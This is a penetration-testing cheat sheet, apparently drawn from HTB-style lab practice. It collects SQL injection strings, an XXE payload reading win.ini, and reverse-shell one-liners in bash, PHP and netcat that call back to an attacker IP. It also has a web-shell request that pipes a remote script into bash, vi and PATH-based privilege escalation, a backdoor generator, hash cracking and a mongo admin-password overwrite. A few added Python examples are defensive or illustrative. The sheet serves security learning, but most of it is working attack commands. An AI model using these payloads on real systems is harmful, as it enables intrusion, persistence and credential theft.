1 - Blue Team

  1. Social Engineering
  2. OSINT (Open-source intelligence)
  3. Google Hacking
  4. Good Habits

Google Hacking

Google dorking: combining search operators such as site:, filetype:, inurl: and intitle: to find indexed files, login pages and misconfigured hosts that were never meant to be public.

Ref:

DFIR (Digital Forensics and Incident Response)

APT (Advanced Persistent Threat)

video: APT攻擊:一場沒有中立國的戰爭(真實案例模擬) (APT attacks: a war with no neutral countries, a real-case simulation)

IR (Incident Response)

  1. Network forensics
    • Network equipment log & packet analytics
  2. Computer forensics
    • Disk image analysis
    • Memory analysis
    • Registry analysis
    • File analysis
    • Process analysis
    • Network analysis
    • Log analysis
  3. Malware forensics
    • Sample acquisition
    • Dynamic and static analysis

2 - Cybersecurity Acronyms

Cybersecurity acronyms and their descriptions (link)

3 - Penetration Test

Flow

VA (Vulnerability Assessment) -> PT (Penetration Test): identify and rank weaknesses first, then try to exploit them to prove real impact.

  1. Planning and Reconnaissance
  2. Scanning
  3. Gaining System Access
  4. Maintaining Access (persistence)
  5. Analysis and Reporting

Injection

SQL injection

Always-true condition (the leading ') closes a quoted value and a parenthesised clause first):
') or ( '1'='1
Always-false counterpart; compare the two responses for boolean-based detection:
') or ( '1'=0
JavaScript-style comparison, aimed at NoSQL / JavaScript query evaluation rather than SQL:
admin'||'1==1
Numeric context (no quotes needed) plus UNION to pull a column from another table; the UNION must match the original column count:
1 or 1 = 1 UNION SELECT user

XXE (XML External Entity) injection

example: the DTD declares an entity whose value is read from a local file; when the parser expands &test; the file contents are returned in the response (or leak through an error message)

<?xml version = "1.0"?>
  <!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>
  <order>
    <quantity>1</quantity>
    <item>&test;</item>
    <address>address</address>
  </order>
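On the defensive side, the precondition for the payload above is that the parser accepts entity declarations at all. The following added Python example (not from the original page) uses the standard-library expat parser to reject any document that declares an entity before the real parse runs, and shows the page's payload being refused while a plain order document is parsed normally. The order documents are constructed sample inputs; the function names are mine.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXML(ValueError):
    """Raised when a document declares entities (the XXE precondition)."""


def check_no_entities(data: str) -> None:
    """First pass with expat only: abort as soon as any <!ENTITY> is declared,
    and never fetch an external entity even if one is referenced."""
    parser = xml.parsers.expat.ParserCreate()

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        kind = "external" if system_id else "internal"
        raise UnsafeXML(f"{kind} entity {name!r} declared (SYSTEM={system_id!r})")

    parser.EntityDeclHandler = on_entity_decl
    # returning 1 without parsing anything means "skip it, do not fetch"
    parser.ExternalEntityRefHandler = lambda ctx, base, sysid, pubid: 1
    parser.Parse(data, True)


def is_safe_xml(data: str) -> bool:
    try:
        check_no_entities(data)
        return True
    except UnsafeXML:
        return False


def parse_order(data: str) -> dict:
    """Gate first, then parse; returns the child elements as a tag -> text dict."""
    check_no_entities(data)
    root = ET.fromstring(data)
    return {child.tag: (child.text or "") for child in root}


# Constructed sample inputs
BENIGN = """<?xml version="1.0"?>
<order><quantity>1</quantity><item>book</item><address>address</address></order>"""

# the cheat sheet's XXE payload, reproduced as test input
XXE = """<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>
<order><quantity>1</quantity><item>&test;</item><address>address</address></order>"""


if __name__ == "__main__":
    print("benign order:", parse_order(BENIGN))
    try:
        parse_order(XXE)
    except UnsafeXML as exc:
        print("rejected:", exc)
```

Raising inside an expat handler aborts the parse and propagates the exception out of Parse(), so the file named in the SYSTEM identifier is never opened. Rejecting the whole DOCTYPE is the stricter variant of the same idea if the application never needs a DTD.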

SSTI (Server Side Template injection)

Probe by submitting a template expression such as {{7*7}} or ${7*7} in an input that is reflected back; if the response contains 49, the input is being evaluated by the template engine.

Tools:

reverse shell

bash

# interactive bash with stdin/stdout/stderr redirected over a TCP connection to your listener (443 is often allowed outbound)
bash -c "bash -i >& /dev/tcp/{your_IP}/443 0>&1"

php

# same named-pipe trick as the netcat one-liner below, wrapped in PHP's system()
<?php system('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc [ip] [port] > /tmp/f; rm /tmp/f'); ?>

Web shell

# a cmd parameter that reaches system(): fetch a script from your own HTTP server on port 8000 and pipe it to bash
Dysco.php?cmd=curl ${your_IP}:8000/shell.sh|bash

Shell

# upgrade a dumb reverse shell to a proper TTY (needed for su, sudo password prompts, vi, etc.)
python3 -c 'import pty;pty.spawn("/bin/bash")'

vi

# output of `sudo -l`:
# User postgres may run the following commands on vaccine:
#     (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

# step 1: vi can change its shell and drop into it (works from any vi session)
vi
:set shell=/bin/sh
:shell

# step 2: do the same from the vi that sudo allows; the spawned shell inherits root
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:set shell=/bin/sh
:shell

SSH tunnel

# windows

# linux: list the ssh processes and their open sockets (local and remote endpoints)
lsof -i -n | egrep '\<ssh\>'

139,445 - Pentesting SMB

# list shares and recursively list their files with the given credentials
smbmap -R -u "hazard" -p "stealth1agent" -H $ip
# get user list by brute-forcing RIDs over SMB (impacket)
# https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py
python lookupsid.py hazard:<password>@<ip>

Program Language

What can you do when you hack into the server

See below

# upgrade to an interactive TTY and fix the terminal type
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color
# put a writable directory first in PATH (only matters if something later resolves a binary through it)
export PATH="/tmp:$PATH"; echo $PATH;

# basic situational awareness
whoami
id
groups
sudo -l                                              # what can this user run as root, and with which env settings?
ps aux                                               # running processes: root services, cron jobs, other users' sessions
cat /etc/passwd | grep -v "nologin\|false\|sync"     # accounts with a real login shell
timeout 5s ...                                       # wrap anything that might hang
ss -tul                                              # listening TCP/UDP sockets, including ones bound only to localhost

# PATH hijack through sudo: sudo only honours a PATH= assignment when the sudoers policy permits it
# (SETENV or env_keep) and no secure_path is set, and it only pays off when the allowed program calls
# another binary by a relative name; /usr/bin/whoami on its own does not, so this line is just the test
sudo PATH="/tmp:$PATH" /usr/bin/whoami
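The PATH lines above describe a hijack but never show the conditions under which it fires. The following added Python example (not from the original page; no sudo involved) reproduces the mechanism locally: a stand-in for a privileged script that calls `whoami` by name, run once with an attacker-controlled directory first in PATH and once with PATH pinned inside the script, which is what sudo's secure_path does for you. The script name, directory layout and fake binary are constructed for the demo.

```python
import os
import subprocess
import tempfile

FAKE_OUTPUT = "hijacked"


def write_script(path: str, body: str, executable: bool) -> None:
    with open(path, "w") as f:
        f.write(body)
    if executable:
        os.chmod(path, 0o755)


def run_victim(hardened: bool) -> str:
    """Run a stand-in for a sudo-allowed script that calls `whoami` by name.
    hardened=True resets PATH inside the script (the secure_path idea)."""
    with tempfile.TemporaryDirectory() as attacker_dir, tempfile.TemporaryDirectory() as victim_dir:
        # attacker-controlled directory holding a fake `whoami` (plays the role of /tmp above)
        write_script(os.path.join(attacker_dir, "whoami"),
                     "#!/bin/sh\necho " + FAKE_OUTPUT + "\n", executable=True)

        # hypothetical privileged script; the relative `whoami` is resolved through PATH
        victim = os.path.join(victim_dir, "maintenance.sh")
        body = "#!/bin/sh\n"
        if hardened:
            body += "PATH=/usr/sbin:/usr/bin:/sbin:/bin\n"   # ignore whatever PATH the caller passed in
        body += "whoami\n"
        write_script(victim, body, executable=False)

        # the caller's environment: PATH="/tmp:$PATH" from the cheat sheet, with /tmp swapped for attacker_dir
        env = dict(os.environ)
        env["PATH"] = attacker_dir + os.pathsep + env.get("PATH", "/usr/bin:/bin")
        result = subprocess.run(["/bin/sh", victim], env=env, capture_output=True, text=True)
        return result.stdout.strip()


if __name__ == "__main__":
    print("unhardened:", run_victim(False))   # prints "hijacked"
    print("hardened:  ", run_victim(True))    # prints the real user name
```

The same check applies when reading `sudo -l` output: a rule for a script or binary is only a PATH-hijack candidate if that program spawns something by a relative name and the sudoers policy lets your PATH through.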

4 - Tools Organization

Content

01 - Information Gathering: 💲Nmap - 💲Netcat (nc), 💲Recon-NG

02 - Vulnerability Analysis:📦Nessus, 📦Open VAS

03 - Web Application Analysis: 📦OWASP ZAP, 📦burpsuite, 💲sqlmap

05 - Password Attacks: 💲John, 💲zip2john

07 - Reverse Engineering: 💲jd-gui

09 - Sniffing & Spoofing: 💲responder, 💲tcpdump, 📦wireshark

10 - Post Exploitation: 💲evil-winrm

14 - System Services: 💲MetaSploit

Usual Applications: #PowerShell(pwsh)

Storage Service: 💲AWS-S3, 💲mysql, 💲redis-cli, 💲smbclient, 💲mongo, 💲tftp

File & Data: ASCII, 💲base64, 💲exiftool

Useful Repository: 📒SecLists

Useful Website

01 - Information Gathering

DNS Analytics

ping / TCP port check

# PowerShell: open a TCP connection to port 80; returns a connected TcpClient object on success and throws if the port is unreachable
New-Object System.Net.Sockets.TCPClient -Argument "rpi4.shdennlin.com","80"

nmap

https://nmap.org/

sudo nmap --top-ports 3000 -F -sS -sC -sV -n -T4 ${ip}

--top-ports 3000: scan the 3000 most common ports (-F and --top-ports both choose the port set, so keep one of them; --top-ports 3000 already covers far more than -F's top 100)

-F: Fast mode - Scan fewer ports than the default scan

-sS (TCP SYN scan) SYN scan is the default and most popular scan option for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls.

-sC: Performs a script scan using the default set of scripts. It is equivalent to --script=default. Some of the scripts in this category are considered intrusive and should not be run against a target network without permission.

-sV: Enables version detection, which will detect what versions are running on what port.

-n (No DNS resolution)

-T4 prohibits the dynamic scan delay from exceeding 10 ms for TCP ports

dns-brute (subdomain brute force): nmap --script dns-brute <domain>

NetCat (nc)

Netcat is a versatile utility for working with TCP or UDP data.

# reverse shell via a named pipe: sh reads commands from /tmp/f, its output goes to nc, and nc writes whatever the listener sends back into /tmp/f
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 172.18.0.1 1337 > /tmp/f; rm /tmp/f
# listener on the attacker side (-n no DNS, -l listen, -v verbose, -p port)
nc -nlvp 1337

# equivalent form with the pipe wired the other way round
rm /tmp/f; mkfifo /tmp/f; nc <attack IP> <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

Transfer a file

# receiving side
sudo nc -lp <port> > <file_name>

# sending side (-w 3: give up after 3 s of inactivity so nc exits once the file is sent)
nc -v -w 3 <ip> <port> < <file_name>
## windows: serve the file on port 3333; the other side connects to it and redirects the stream to a file
type <file_name> | nc.exe -l -p 3333

Recon-NG

02 - Vulnerability Analysis

Nessus

03 - Web Application Analysis

gobuster

directory/file enumeration mode

  • gobuster dir --url $url --wordlist $tool/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 30

VHOST enumeration mode

  • gobuster vhost -w ../../tools/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb

ffuf

# virtual-host fuzzing: the URL stays fixed and the Host header is fuzzed (add -fs <size> to hide the default catch-all response)
ffuf -u http://<target> -w <wordlist.txt> -H "Host: FUZZ.<domain>"

dirsearch

https://github.com/maurosoria/dirsearch

sqlmap

# --os-shell tries to spawn an OS shell through the injection point; --cookie carries the session if the page needs one
sqlmap -u "http://<ip>/dashboard.php?search=any+query" --cookie="" --os-shell

whatweb

whatweb -v -a 3 <url>

05 - Password Attacks

john

Password cracker.

# dictionary attack; john detects the hash format automatically (override with --format=)
john -w=rockyou.txt hash.txt

hashid

# guess the hash type from its length and format (hashid -m also prints the matching hashcat mode)
hashid <hash>

hashcat

# -a 0: straight/dictionary attack, -m 0: MD5 (choose the mode from hashid's output)
hashcat -a 0 -m 0 <hash.txt> /usr/share/eaphammer/wordlists/rockyou.txt
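The john, hashid and hashcat lines above are one workflow: identify the hash format, pick the matching mode, then run a dictionary attack. The following added Python example (not from the original page) does the same in miniature for plain unsalted hex digests: a length-based guess like hashid's, mapped to the hashcat -m mode, and a wordlist attack with hashlib. The wordlist and target hashes are constructed in the block; crypt-style $6$ hashes (what mkpasswd -m sha-512 produces) are only identified, not cracked, because hashlib has no sha512crypt.

```python
import hashlib
import re

# Length -> (hashlib name, hashcat -m mode). Assumption: unsalted hex digests only;
# real hashid returns several candidates per length, this keeps the most common one.
HEX_DIGESTS = {32: ("md5", 0), 40: ("sha1", 100), 64: ("sha256", 1400), 128: ("sha512", 1700)}


def identify(h: str):
    """Return (name, hashcat_mode) or None if the format is not recognised."""
    if h.startswith("$6$"):
        return ("sha512crypt", 1800)          # crypt(3) SHA-512, as produced by mkpasswd -m sha-512
    if re.fullmatch(r"[0-9a-fA-F]+", h) and len(h) in HEX_DIGESTS:
        return HEX_DIGESTS[len(h)]
    return None


def wordlist_attack(h: str, words):
    """Dictionary attack (the hashcat -a 0 / john -w idea) for the plain digests above.
    Returns the matching word or None."""
    guess = identify(h)
    if guess is None or guess[0] == "sha512crypt":
        return None                             # leave crypt-style hashes to john/hashcat
    target = h.lower()
    for word in words:
        if hashlib.new(guess[0], word.encode()).hexdigest() == target:
            return word
    return None


# Constructed sample wordlist and targets (not captured material)
WORDS = ["123456", "password", "qwerty", "letmein", "hunter2"]
SAMPLE_MD5 = hashlib.md5(b"letmein").hexdigest()
SAMPLE_SHA256 = hashlib.sha256(b"hunter2").hexdigest()


if __name__ == "__main__":
    for h in (SAMPLE_MD5, SAMPLE_SHA256, "$6$salt$notreallyahash"):
        print(identify(h), "->", wordlist_attack(h, WORDS))
```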

zip2john

zip2john XXX.zip > hash

hydra

wfuzz

wfuzz --sc 200 -w num.txt -H "Cookie: user=FUZZ; role=guest"  http://10.129.81.172/uploads/

--sc 200: only show responses with status code 200

mkpasswd

mkpasswd -m sha-512 password

07 - Reverse Engineering

jd-gui

jd-gui XXX.jar

09 - Sniffing & Spoofing

10 - Post Exploitation

webacoo

PHP web backdoor generator (commands travel in cookies, so they stay out of the access log's request line)

# Generate the backdoor
webacoo -g -o test.php

# connect to the uploaded backdoor
webacoo -t -u http://<url>/test.php

14 - System Services

MetaSploit

sudo msfconsole
msf6 > search xxx
msf6 > use xxx
msf6 xxx(xxx) > show options
msf6 xxx(xxx) > set XX xxx
msf6 xxx(xxx) > run

Usual Applications

PowerShell(pwsh)

# Start a Remote Session
Enter-PSSession -ComputerName COMPUTER -Credential USER -Authentication Negotiate

Storage Service

AWS-S3

  • aws configure
  • aws s3 ls

smbclient

  • smbclient --no-pass -L //${ip}

-L: list shares; -U: user name; --no-pass: try a null session without prompting for a password

  • smbclient --no-pass //${ip}/<Folder>

mongo

mongo --host 127.0.0.1:27117
db.adminCommand( { listDatabases: 1 })
use <db>
db.admin.find().forEach(printjson);
// overwrite the admin user's password hash (x_shadow) with one you generated, e.g. with mkpasswd -m sha-512
db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"<SHA_512 Hash Generated>"}})

tftp

tftp <ip>

File & Data

ASCII

  • convert ASCII values into ASCII characters:
    echo "65 66 67" | awk '{ for(i=1;i<=NF;i++) printf("%c",$i); print ""; }'

base64

Encode or decode file or standard input to/from Base64, to standard output.
More information: https://www.gnu.org/software/coreutils/base64.

  • Encode the contents of a file as base64 and write the result to stdout:
    base64 filename

  • Decode the base64 contents of a file and write the result to stdout:
    base64 --decode filename

  • Encode from stdin:
    <command> | base64

  • Decode from stdin:
    <command> | base64 --decode

exiftool

Read and write meta information in files.
More information: https://exiftool.org.

Useful Repository

SecLists

https://github.com/danielmiessler/SecLists

SecLists is the security tester’s companion. It’s a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.

pspy

https://github.com/DominicBreuker/pspy

Monitor linux processes without root permissions

Useful Website